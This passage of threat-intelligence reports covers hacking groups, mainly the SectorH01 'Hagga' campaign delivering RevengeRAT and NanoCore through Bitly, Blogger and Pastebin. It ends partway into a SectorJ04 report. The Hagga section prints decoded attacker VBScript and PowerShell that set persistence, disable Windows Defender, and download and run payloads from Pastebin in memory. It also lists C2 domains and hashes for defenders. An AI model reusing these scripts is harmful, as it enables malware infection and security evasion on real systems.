The hacking activity of SectorC08 group has been found in Ukraine, United Kingdom, Belarus, Sweden, Argentina, United States and China.

The SectorC groups used different attack vectors. SectorC02 group stole sensitive email information from internal Microsoft Exchange servers connected to the Internet while the SecotorC03 and SectorC08 groups used spear phishing emails with malware as their primary hacking technique, similar to their other hacking activities found in the past.

However, the SectorC08 group has the characteristic of using 7ZipSfx compressed files as attachments to specific hacking targets.

The SectorC groups have many more attack technique at their disposal than threat actors of other groups because of their long history. Recently, they have been working to achieve the political objectives of their government, and this is expected to continue.

4. SectorD Activity Features

Among the SectorD groups, the activities of two hacking groups, SectorD02, SecotorD14 were found among SectorD hacking groups this August.

The hacking activity of SectorD02 group was found in Tajikistan and Uzbekistan.

The hacking activity of SectorD14 group has been found in Canada, United States, United Arab Emirates and Kuwait. In particular, the SectorD14 group conducted hacking activities on Industrial Control Systems (ICS) owned by government agencies, and natural gas and oil companies related to countries located in the Middle East, which may be related to a recent drone attack.

The basic hacking techniques of the SectorD groups are similar to those in the past, using a Microsoft Word file with a malicious macro as an attachment to a spear phishing email.

At the moment, diplomatic measures involving the SectorD group’s government are under way in Western countries, mainly in the United States, and the aforementioned physical attacks on oil fields in Saudi Arabia may soon lead to cyber wars with physical conflicts between the Middle East and Western countries.

5. SectorE Activity Features

Among the SectorE groups, the activities of three hacking groups, SectorE01, SecotorE02 and SectorE04 were found among SectorE hacking groups this August.

The hacking activity of SectorE01 group was found in Poland, Germany and the United Kingdom.

The hacking activity of SectorE02 group was found in Pakistan, United Kingdom, United States, Ukraine, Netherlands and the Germany.

The hacking activity of SectorE04 was found in China.

SectorE hacking groups have mainly been conducting hacking activities targeting countries that are politically competitive with SectorE group’s government, but the range of geographical hacking activities of these groups is gradually widening.

The hacking groups discovered in August mainly used spear phishing, attaching document files that exploited known Microsoft Word vulnerabilities or containing malicious macro code.

The SectorE groups are expanding their range of activity, and their recent activities have been found frequently in East Asia. In addition, it is highly likely that they will continue to develop new hacking techniques by copying techniques of other hacking groups or through their own research process.

6. SectorF Activity Features

August hacking activity of the SectorF01 group has been found in Cambodia, China, South Korea, Japan, United States, Ireland, Russian Federation, and Australia. They used malware that is highly similar to the ones found in the past, and spear phishing emails with document files containing malicious macro code as attachments are sent to their targets.

In the past, there have been many cases where their hacking activity have been discovered in the Southeast Asia region, and recently, their hacking activities have been carried out for the purpose of economic development of their country. The hacking activity radius of this hacking group is expected to gradually increase and it is necessary to continue further analysis based on their hacking activity areas and targets.

7. Cyber Crime Activity Features

In August, a total of six hacking groups, SectorJ01, SectorJ04, SectorJ07, SectorJ10, SectorJ12 and SectorJ13, were found among the Cyber Crime Groups. Unlike other government-backed hacking groups, they collect information such as Credit Card information that can be monetized in the real world. They also hack organizations to spread ransomware on their internal network, or steal important industry secrets to sell them online.

The hacking activity of SectorJ01 group has been found in the Russian Federation, Romania, United Kingdom, Costa Rica and United States. The SectorJ01 Group is conducting hacking campaigns in Europe and North America this August. They collect various types of personal and corporate information that exists inside infected PCs from malware distributed through the spear phishing email.

The hacking activity of SectorJ04 group has been found in United Kingdom, United States, South Korea, Germany, Turkey, France, Bulgaria, Serbia, India, Canada, Argentina, Bangladesh and Hong Kong. They mainly hack into companies in various industries including transportation, universities, government agencies, manufacturing, semiconductors, online commercials, chemicals, and health. In the first half of 2019, they intensively hacked organizations in Asia, but their recent trend seems to be to move hacking activity back to Europe and North America.

The hacking activity of SectorJ07 group has been found in China, United States and Ukraine. They mainly produce malware that runs on Linux that can mine cryptocurrencies on high-performance servers utilized by companies.

The hacking activity of SectorJ10 group has been found in Philippines and United States. Attacks are carried out using spear phishing emails containing malware in the form of document files which have malicious macro code included inside. The macro calls to the Windows Management Instrumentation Command-line (WMIC), and the WMIC finally executes a malicious PowerShell script.

SectorJ12 group conducted hacking activities targeting energy, entertainment, consulting and manufacturing companies located in France, Taiwan and Poland. The spear phishing email have an ACE archive attached, and this ACE archive contains the Visual Basic Script (VBScript) for getting the malicious PowerShell script from the attacker’s server.

The hacking activity of SectorJ13 group has been found in South Korea, Ukraine and United Kingdom. They send spear phishing emails with document files containing malicious macro code attached. When executing the Word document, the macro script uses a technique to download additional malware from the attacker’s server by running PowerShell. SectorJ13 was previously only active in Europe, but its activity was recently found in Korea as well. This is a group that needs to be watched closely if it is targeting South Korea with similar intent and purpose as the SectorJ04 group.


The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net.

Hagga of SectorH01 continues abusing Bitly, Blogger and Pastebin to deliver RevengeRAT and NanoCore

Overview

“Hagga” is the username of a Pastebin account used since December last year by a pervasive known group of threat actors which targets thousands of users around the world both for cyber espionage and cyber crime purposes using malspam. Their activities were first discovered in 2017, and the ThreatRecon Team tracks both this group and the members behind “Hagga” collectively as the SectorH01 group.

Since their activities were first discovered, they have been observed using a variety of commodity malware being spread from the same hosts and communicating with the same C2 addresses. Some of those commodity malware used in the past include RevengeRAT and NanoCore, which they are still using till now.

SectorH01 Group Attack Lifecycle

Their Targeting

Sectors the SectorH01 group has been observed targeting since discovery, likely for intelligence purposes:

  • Defense
  • Dissidents
  • Governments
  • Military

Sectors the SectorH01 group has been observed targeting since discovery, likely for criminal purposes:

  • Agriculture
  • Food
  • Hospitality
  • Manufacturing
  • News Media
  • Shipping
  • Tourism
  • Trade

Countries the SectorH01 group has been observed targeting for this event:

  • United States
  • United Kingdom
  • Latvia
  • France
  • Germany
  • India
  • Japan
  • South Korea
  • Taiwan
  • Thailand
  • Turkey
  • Vietnam

The targets of the malware in this blog post appear to be only for criminal activities
from June to September targeting enterprise users, the majority of whom are based in the United States.

The Phish

SectorH01 group sends phishing emails to their targets with subjects related to payments, such as purchase orders, invoices, request for quotations, telegraphic transfer confirmation documents, or overdue payments. In these emails, they attach file(s) related to the email contents in the form of Excel XLS, Microsoft Word DOC/DOCX, RTF, and ZIP files.

Sample Excel File (b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d)

In the cases of Excel XLS files, they have in recent months been using simple obfuscated VBA macros which executes mshta.exe against a Bitly shortened link which redirects to a Google Blogger (blogspot) link.

VBA Macro which executes mshta.exe embedded in malicious XLS file

The Blogger page looks benign but has obfuscated JavaScript hidden in its source code. This pattern of obfuscating JavaScript code is extensively used not only in the Blogger page but also on Pastebin, which is obfuscated over multiple layers and eventually decodes to various VBScript scripts which are run by the mshta.exe utility.

SectorH01 commonly uses multiple layers of the same encoding for its Pastebin scripts

By performing the same decoding on the Javascript code, we get the VBScript which performs multiple tasks such as terminating processes and setting persistence.

Example Decoded Script
<script language=”VBScript”> Set X7W832DSA = CreateObject(StrReverse(StrReverse(“WScript.Shell”))) Dim ASSd712ji8asd ASSd712ji8asd = “cmd.exe /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit” X7W832DSA.Run ASSd712ji8asd, vbHide Set X_ws = CreateObject(“WScript.Shell”) Pa_2da = “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate” X_ws.RegWrite Pa_2da,”mshta.exe http://pastebin.com/raw/2gY9SAwU”,”REG_EXPAND_SZ” Set Mi_G = CreateObject(StrReverse(StrReverse(“WScript.Shell”))) Dim X_hw X_hw0 = StrReverse(“t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs”) X_hw1 = “n “”Avast Updater”” /tr “”mshta.ex” X_hw2 = “e h” + “t” + “t” + “p” + “:” + “/” + “/” + “p” + “a” + “s” + “t” + “e” + “b” + “i” + “n” + “.” + “c” + “o” + “m” + “/” + “r” + “a” + “w” + “/qZXnhtQG”” /F ” X_hw = X_hw0 + X_hw1 + X_hw2 Mi_G.Run X_hw, vbHide Set Ox_xw = CreateObject(StrReverse(StrReverse(“WScript.Shell”))) Dim P_wx P_wx0 = StrReverse(“t/ 003 om/ ETUNIM cs/ etaerc/ sksathcs”) P_wx1 = “n “”Avast backup”” /tr “”mshta.ex” P_wx2 = “e h” + “t” + “t” + “p” + “:” + “/” + “/” + “p” + “a” + “s” + “t” + “e” + “b” + “i” + “n” + “.” + “c” + “o” + “m” + “/” + “r” + “a” + “w” + “/Htp0LKHg”” /F ” P_wx = P_wx0 + P_wx1 + P_wx2 Ox_xw.Run P_wx, vbHide self.close </script>

Going into one of the scheduled tasks, we see more encoded text.

Example First-Layer Decoded Scheduled Task
<script language=”VBScript”> Set EAsxw = CreateObject(StrReverse(“llehS.tpircSW”)) Dim Xsks Xsks = StrReverse(“XEI|)OLOL$(gnirtSteG.IICSA::]gnidocnE.txeT.metsyS[;)14,201,63,44,93,101,021,101,64,001,801,501,711,66,38,77,93,04,101,021,101,85,85,39,211,711,611,501,701,99,79,27,64,701,19,95,88,96,37,421,14,93,021,84,93,44,93,33,46,53,93,04,101,99,79,801,211,101,411,64,14,93,84,67,88,68,711,35,101,84,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,201,63,39,39,19,101,611,121,66,19,95,88,96,37,421,14,93,98,27,121,711,17,56,15,94,74,911,79,411,74,901,111,99,64,011,501,89,101,611,511,79,211,74,74,85,511,211,611,611,401,93,44,001,111,401,611,101,77,85,85,39,101,211,121,48,801,801,79,76,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,44,93,301,011,501,411,611,38,001,79,111,801,011,911,111,86,93,44,14,611,011,101,501,801,76,89,101,78,64,611,101,87,23,611,99,101,601,89,97,54,911,101,87,04,04,101,901,79,011,121,66,801,801,79,76,85,85,39,011,111,501,611,99,79,411,101,611,011,37,64,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,19,16,601,201,63,95,14,93,99,501,511,79,66,801,79,711,511,501,68,64,611,201,111,511,111,411,99,501,77,93,04,101,901,79,87,801,79,501,611,411,79,08,401,611,501,78,001,79,111,67,85,85,39,121,801,89,901,101,511,511,56,64,011,111,501,611,99,101,801,201,101,28,64,901,101,611,511,121,38,19,23,39,001,501,111,811,19(@=OLOL$”) X_WRc = StrReverse(“P”) + StrReverse(“o”) + StrReverse(“w”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + StrReverse(“r”) + StrReverse(“s”) + StrReverse(“h”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + StrReverse(StrReverse(“l”)) + StrReverse(StrReverse(“l”)) + StrReverse(“.”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + StrReverse(“x”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + Space(1) + Xsks EAsxw.Run X_WRc, vbHide self.close </script>

Finally, further decoding shows it loading different malware from two Pastebin sites, which are again obfuscated.

Example Second-Layer Decoded Scheduled Task
[void] [System.Reflection.Assembly]::LoadWithPartialName(‘Microsoft.VisualBasic’);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin.com/raw/13AGuyHY’)|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin.com/raw/0e5uVXL0′).replace(‘#@!’,’0x’)|IEX;[k.Hackitup]::exe(‘MSBuild.exe’,$f)

At other times, the decoded scripts will make use of .NET Reflection

Example of .NET Reflection in Decoded Script
do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName(‘Microsoft.VisualBasic’);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin.com/raw/QppWFhGC’)|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin.com/raw/Q8g1d6Be’).replace(‘)&*^’,’0x’)|IEX;$obj =@(‘MSBuild.exe’,$f);$g22=$a.GetType(‘THC452563sdfdsdfgr4777cxg04477fsdf810df777’);$y=$g22.GetMethod(‘retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe’);$j=[Activator]::CreateInstance($g22,$null);$y.Invoke($j,$obj)

After looking at the various scripts used, we observed these obfuscated JavaScript code mainly serving one or more of these purposes:

  • Terminating Microsoft Office processes winword.exe, excel.exe, MSPUB.exe, POWERPNT.exe, and sometimes Windows Defender processes MSASCuiL.exe and MpCmdRun.exe
  • Interfering with Windows Defender via command “MpCmdRun.exe -removedefinitions -dynamicsignatures”
  • Setting Registry Autorun Persistence to execute mshta.exe on a Pastebin url
  • Setting Scheduled Task Persistence to execute mshta.exe on a Pastebin url
  • Executing malware in memory, sometimes in Microsoft’s .NET MSBuild.exe

In most cases, SectorH01 group in fact performed all of the above and sometimes multiple of the above by stacking multiple Pastebin urls and multiple commands in a single url. Moreover, since SectorH01 group is using the “Hagga” Pastebin account which has the ability to perform edits on the user’s pastes, they at times modify the paste to perform different actions. Below is the attack flow using this sample Excel file as an example.

SiteAction
www[.]bitly[.]com/adsodeasdaRedirect to https://xasjow21d[.]blogspot.com/p/14[.]html
https://xasjow21d[.]blogspot.com/p/14[.]html mshta.exe http://www[.]pastebin[.]com/raw/8uJavttD
http://www[.]pastebin[.]com/raw/8uJavttD (1) MpCmdRun.exe -removedefinitions -dynamicsignatures
(2) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe / MSASCuiL.exe / MpCmdRun.exe
(3) Run https://pastebin[.]com/raw/7EdEuebH via PowerShell
(4) Run http://pastebin[.]com/raw/ri21rHbF via mshta.exe
http://pastebin[.]com/raw/ri21rHbFDeobfuscates to RevengeRAT (CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856)
http://pastebin[.]com/raw/ri21rHbF [Paste Edit 1](1) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe
(2) Set Registry Autorun Persistence to execute
mshta.exe http://pastebin[.]com/raw/2gY9SAwU
(3) Set Scheduled Task Persistence to execute
mshta.exe http://pastebin[.]com/raw/qZXnhtQG
(4) Set Scheduled Task Persistence to execute
mshta.exe http://pastebin[.]com/raw/Htp0LKHg
http://pastebin[.]com/raw/ri21rHbF [Paste Edit 2] (1) ping Google
(2) Run https://pastebin[.]com/raw/QppWFhGC via Reflection
(3) Run https://pastebin[.]com/raw/Q8g1d6Be
replace(‘)&*^’,’0x’) via Reflection
http://pastebin[.]com/raw/2gY9SAwU Self.close()
http://pastebin[.]com/raw/qZXnhtQG (1) Execute https://pastebin[.]com/raw/13AGuyHY
via Reflection
(2) Execute k.Hackitup() in https://pastebin[.]com/raw/0e5uVXL0
replace(‘#@!’,’0x’) via Reflection
http://pastebin[.]com/raw/Htp0LKHg Self.close()
https://pastebin[.]com/raw/QppWFhGC Deobfuscates to a code injector (E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393)
Obfuscated with ConfuserEx
https://pastebin[.]com/raw/Q8g1d6Be Deobfuscates to NanoCore (E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E)
Obfuscated with Eazfuscator
https://pastebin[.]com/raw/13AGuyHY Deobfuscates to a code injector (84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6)
Obfuscated with ConfuserEx
https://pastebin[.]com/raw/0e5uVXL0 Deobfuscates to NanoCore (94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197)
Obfuscated with Eazfuscator

Usage of bit.ly, blogspot and pastebin allows SectorH01 group to be less traceable on the infrastructure side, but it is because of this that we know their pastes center around the “hagga” user these days. As long as Pastebin tolerates this user, they are likely to continue using the account because Pastebin pro accounts are no longer for sale.

But as pastes can be easily removed by incoming abuse reports, the SectorH01 group hedges their risk by getting to connect to multiple unlisted pastes. We see this same hedging they perform on their target endpoints, where they put multiple layers of persistence, use more than one type of RAT at the initial stage, and connect to multiple servers.

RevengeRAT

RevengeRAT is a RAT which has its malware builder and source code publicly available. It is set to use the C2 address ontothenextone[.]duckdns[.]org.

Some of the configuration settings of this RevengeRAT variant

RevengeRAT uses Base64 encoding for its C2 traffic and this information is easily decoded. From the configuration settings, we see the key variable “Revenge-RAT” and the SPL variable “-]NK[-“, both of which are used as delimiters between the Base64 encoded data.

Information sent to the C2 in a past packet capture of this sample which can be easily decoded

NanoCore

NanoCore is a RAT which was available for sale from 2014-2016 and has been leaked over the years. While the developer of NanoCore was arrested and sentenced last year, the RAT is still used by attackers.

In this case, the two NanoCore samples we found encoded in Pastebin sites attempted to connect to the C2 addresses attilabanks[.]ddns[.]net and yakka[.]duckdns[.]org. The C2 traffic of NanoCore is known to use the DES algorithm for encryption.I

Summary

SectorH01 is a threat group which in most cases, targets seemingly indiscriminately at enterprise users; even when they target for espionage, their TTPs have been known to stay fairly constant. They remain brazen in their attacks although we see a slight improvement in their operational security, and still use relatively simple tricks such as macros, known and detected RATs but in-memory only, and connect to domains such as Pastebin and dynamic DNS servers which should raise red flags or at least questions. All of these should be opportunities for organizations to detect the SectorH01 group.

Indicators of Compromise (IoCs)

Malicious Documents (SHA-256)

b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d
c763340ae4acecd3e7d85b118bbad6bb4b1d433a6398571afd4c2c27a304ab4e
e83304a5ae3e6ef366858c48aa8706d8e088aba86c724d575b4ad2e0ebaea7cd
d757406ae30d7822ebe63c28ff09ac7b1eca1a0e37e6f706c442f4f7517a624b
399b7823b707ac07c65940a30e85bdf5c0c7ed1bba5b5034ebcf189937636a44

RevengeRAT (SHA-256)

CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856

NanoCore (SHA-256)

94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197
E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E

Code Injectors (SHA-256)

84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6
E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393

C2 Domains

ontothenextone[.]duckdns[.]org
haggapaggawagga[.]duckdns.org
attilabanks[.]ddns[.]net
yakka[.]duckdns[.]org

Abused Legitimate Services

bitly[.]com/aswoesx2yxwxxd
bitly[.]com/adsodeasda
bitly[.]com/uiQSQWSQWSNnase
bitly[.]com/aswoeosXxxwxhh
xaasxasxasx[.]blogspot[.]com/p/kudi[.]html
xasjow21d[.]blogspot[.]com/p/14[.]html
axxwnxiaxs[.]blogspot[.]com/p/13[.]html
pastebin[.]com/raw/wZSPpxaG
pastebin[.]com/raw/2gY9SAwU
pastebin[.]com/raw/qZXnhtQG
pastebin[.]com/raw/Htp0LKHg
pastebin[.]com/raw/13AGuyHY
pastebin[.]com/raw/0e5uVXL0
pastebin[.]com/raw/8uJavttD
pastebin[.]com/raw/7EdEuebH
pastebin[.]com/raw/ri21rHbF
pastebin[.]com/raw/QppWFhGC
pastebin[.]com/raw/Q8g1d6Be
pastebin[.]com/raw/VpKuzs3R
pastebin[.]com/raw/kqm60tX5
pastebin[.]com/raw/3pEVfu9k
pastebin[.]com/raw/3VNZw83B
pastebin[.]com/raw/8Q050Drg
pastebin[.]com/raw/jX4MuzmX

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1173 Dynamic Data Exchange
T1106 Execution through API
T1203 Exploitation for Client Execution
T1170 Mshta
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1108 Redundant Access
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1089 Disabling Security Tools
T1054 Indicator Blocking
T1202 Indirect Command Execution
T1112 Modify Registry
T1170 Mshta
T1045 Software Packing
T1055 Process Injection
T1064 Scripting
T1108 Redundant Access
T1102 Web Service

Credential Access

T1056 Input Capture
T1081 Credentials in Files
T1241 Credentials in Registry

Discovery

T1016 System Network Configuration Discovery
T1033 System Owner/User Discovery
T1057 Process Discovery
T1063 Security Software Discovery
T1082 System Information Discovery
T1083 File and Directory Discovery

Collection

T1056 Input Capture
T1123 Audio Capture
T1125 Video Capture

Command and Control

T1032 Standard Cryptographic Protocol
T1065 Uncommonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding

Exfiltration

T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

References

[1] The Daily Beast – FBI Arrests Hacker Who Hacked No One
https://www.thedailybeast.com/fbi-arrests-hacker-who-hacked-no-one

SectorJ04 Group’s Increased Activity in 2019

Abstract

SectorJ04 is a Russian-based cybercrime group that began operating about five years ago and conducted hacking activities for financial profit using malware such as banking trojans and ransomware against national and industrial sectors located across Europe, North America and West Africa.

In 2019, the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia, and is changing the pattern of their attacks from targeted attacks to searching for random victims. This report includes details related to the major hacking targets of the SectorJ04 group in 2019, how those targets were hacked, characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking.

SectorJ04 group activity range and hacking methods

The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia. There was a significant increase in their hacking activities in 2019, especially those targeting South Korea. They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server.

Main countries and sectors targeted

The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe, or general companies such as retail and manufacturing, but they recently expanded their areas of activity to include the medical, pharmaceutical, media, energy and manufacturing industries. They do not appear to place much restrictions on the sectors targeted. The following are the sectors and countries under which SectorJ04 group was found in 2019.

Figure 1 SectorJ04 group’s first half activity timeline in 2019

Targeted Countries

We saw SectorJ04 group activity in Germany, Indonesia, the United States, Taiwan, India, France, Serbia, Ecuador, Argentina, South Korea, Japan, China, Britain, South Africa, Italy, Hong Kong, Romania, Ukraine, Macedonia, Russia, Switzerland, Senegal, the Philippines, UAE, Qatar, Saudi Arabia, Pakistan, Thailand, Bahrain, Turkey, Bulgaria, Bangladesh

Figure 2 SectorJ04 group targeted countries

Targeted Industries

  • Financial-related corporate and government departments such as banks and exchanges
  • Retail business such as shopping malls and social commerce
  • Educational institutions such as a universities
  • Manufacturing companies such as manufactures of electronic products
  • Media companies such as broadcasting and media
  • Pharmaceutical and biotechnology-related companies
  • A job-seeking company
  • Energy-related companies such as urban gas and wind power generation

Hacking Techniques

The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached, and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system. As anti-virus programs have recently begun to detect MSI files, in some instances macro scripts contained in the malicious documents would install backdoors directly onto infected systems without using MSI files.

Figure 3 Schematic drawing for SectorJ04 group’s hacking method

Malicious documents used for hacking are mainly written as themes related to MS Office, and the same themes are often used several times, with only language changes depending on the victim’s language.

In addition, the MSI files backdoor used by SectorJ04 mostly had valid digital signatures, and most of their malware were signed just days before they were found.

Figure 4 Part of the malicious document execution screen that the SectorJ04 group attaches to the spear phishing email
Figure 5 Part of the digital signature found in the executable used for hacking

Digital signature information found in malware

  • VAL TRADEMARK TWO LIMITED
  • ALLO LTD
  • COME AWAY FILMS LTD
  • AWAY PARTNERS LIMITED
  • ANG APPCONN LIMITED
  • START ARCHITECTURE LTD
  • SLON LTD
  • DIGITAL DR
  • FIT AND FLEX LIMITED
  • Dream Body Limited
  • BOOK A TEACHER LTD
  • MARK A EVANS LTD
  • WAL GRAY LTD
  • MISHA LONDON LTD
  • START ARCHITECTURE LT
  • BASS AUTOMOTIVE LIMITE
  • FILESWAP GLOBAL LT
  • HAB CLUB LT
  • ET HOMES LT

Main Malware Used

The SectorJ04 group mainly used their own backdoor, ServHelper and FlawedAmmy RAT, for hacking. They also used the Remote Manipulator System (RMS) RAT, a legitimate remote management software created in Russia. Backdoors are installed in infected systems and they also distributed email stealers, botnet malware and ransomware through those backdoors.

They were recently confirmed to use additional backdoor called AdroMut and FlowerPippi, which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file, or to collect system information and send it to the attacker’s server.

Malware Types Found Before 2019

ServHelperFlawedAmmy RATRMS RAT
Initial Infection MethodAn MSI file that is downloaded from a document file attached to a spear phishing email.
Downloaded by MSINullsoft InstallerEncoded FlawedAmmy RATSFX File
CharacteristicC2 response has certain separatorCheck for Antivirus
Register AutoPlay with “wsus.exe”
Utilize configuration files in DAT formats

Malware Types Found After 2019

AdroMutFlowerPippi
Initial Infection MethodDocument files attached to the spear phishing emails
CharacteristicsInternal-used strings are decoded into AES-256-ECB mode after base64 decode.
Configure infection system information in JSON format (encrypted)
Load into “ComputerDefaults.exe” using DLL side loading technique
A simpler function than hard-coded RC4 key AdroMut

Backdoor installed in the infected system distributed additional botnet malware, ransomware and email stealers. The email stealer collects connection protocol information and account information, such as SMTP, IMAP, and POP3, which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format.

Figure 6 Format to send email credentials collected by email stealer
Figure 7 Some of the email stealer codes that access email account information stored in the registry
Figure 8 Some of the email stealer codes that access email account information stored in the registry 2

An email stealer may also have a file collection function to collect email information that is recorded in the metadata of the file corresponding to the hard-coded extension. In addition, the malware eventually creates and executes a batch file for self-delete, removing the execution traces from the infected PC.

Figure 9 Some of the file extensions that the email stealer collects data from

The SectorJ04 group is believed to collect email accounts stored in infection systems for use in subsequent attacks.

Characteristics of hacking activities of SectorJ04 group in 2019

The following are the features of the first half of 2019 activities identified through the analysis of the SectorJ04 group’s hacking activities.

  • Increased hacking activities targeting East and Southeast Asia
  • Changes in spam email format and hacking methods
  • Changes in targets of hacking from specific organizations and industry groups to large number of irregular ones

Although the SectorJ04 group mainly targeted countries located in Europe or North America, it has recently expanded its field of activities to countries located in Southeast Asia and East Asia. In particular, the frequency of hacking attacks targeting South Korea has increased, and spam emails targeting China were found in May.

The changes could also be seen in attachments to spam emails used by attackers. Existing spam emails used attachments in the form of malicious documents, but attachments with HTM and HTML extensions were also found and the text included links to download malicious documents directly.

The SectorJ04 group’s initial spam emails had no mail content or only short sentences, but the latest spam emails found were elaborately written and included images. A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04.

Prior to 2019, the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware, such as Locky and GlobeImporter, along with its banking Trojan, on its victims computers. But after 2019 the group has changed its hacking strategy to attack using spam email. In particular, a number of remote control malware are utilized to gain access to resources such as email accounts and system login information from the infected machine to send more spam emails and distribute their malware.

Increased hacking activities targeting East and Southeast Asia

The hacking activities of SectorJ04 group, which targeted South Korea in the first half of 2019, have been continuously discovered. The emails found were written in relation to invoice and tax accounting data, and were attached the MS Word or Excel files with malicious macros inserted. Malicious documents written in Korean have the same characteristics as other language hacking activities under the theme of MS Office.

Figure 10 Spear phishing emails disguised as order sheets

In June 2019, continuous hacking activities targeting South Korea were found again and spam emails were written with various contents, including transaction statements, receipts and remittance cards. During that period, a number of spam emails disguised as remittance cards of the same type were found.

Figure 11 Spear phishing email disguised as a remittance card

The SectorJ04 group has carried out large-scale hacking activities targeting South Korea, while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines. Spam emails and attachments written in Chinese were found in May, and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications, international schools and manufacturing.

Figure 12 Spear phishing emails written in Chinese
Figure 13 Malicious excel file execution screen written in Chinese

Changes in spam email format and hacking methods

In June, SectorJ04 group conducted hacking using spam emails written in various languages, including English, Arabic, Korean and Italian, and the emails were written with various contents, including remittance card, invoice and tax invoice.

Along with the existing method of using MS Word or Excel files as attachments, they used HTML files to download malicious documents as attachments, or included links to download malicious documents directly in the text.

In the past, the emails used in attacks had little or no content, but the latest ones use elaborated spam emails for hacking, such as using images.

Figure 14 Spear phishing email disguised as bank statement
Figure 15 Spear phishing email disguised as a hospital certificate

Changes have also been found in the hacking method of the SectorJ04 group. In addition to their preexist backdoor, ServHelper and FlawedAmmy, they have also been confirmed to use the backdoor called AdroMut and FlowerPippi.

AdroMut downloads the malware (ServHelper and FlawedAmmy RAT) used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor.

FlowerPippi collects infection system information, such as the domain of the infected system, proxy settings, administrator rights, and OS version, and performs functions such as executing commands received, downloading and executing DLL and EXE files.

Figure 16 Encoded Strings on the AdroMut Backdoor
Figure 17 RC4 key with hard-coded view from the FlowerPippi back door

The SectorJ04 group is believed to have developed and used malware that functions as a downloader for the purpose of installing or downloading malware to replace the MSI installation files that they have used for hacking for more than six months as the detection rate of security solutions increased.

Figure 18 Some of the digital certificate information identified in the corresponding hacking activity

The SectorJ04 group, which has been utilizing the same pattern of infection and the same malware for more than six months, is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files, changing their spam email format and using new types of backdoor.

Changes in hacking targets from specific organizations and industries to random ones

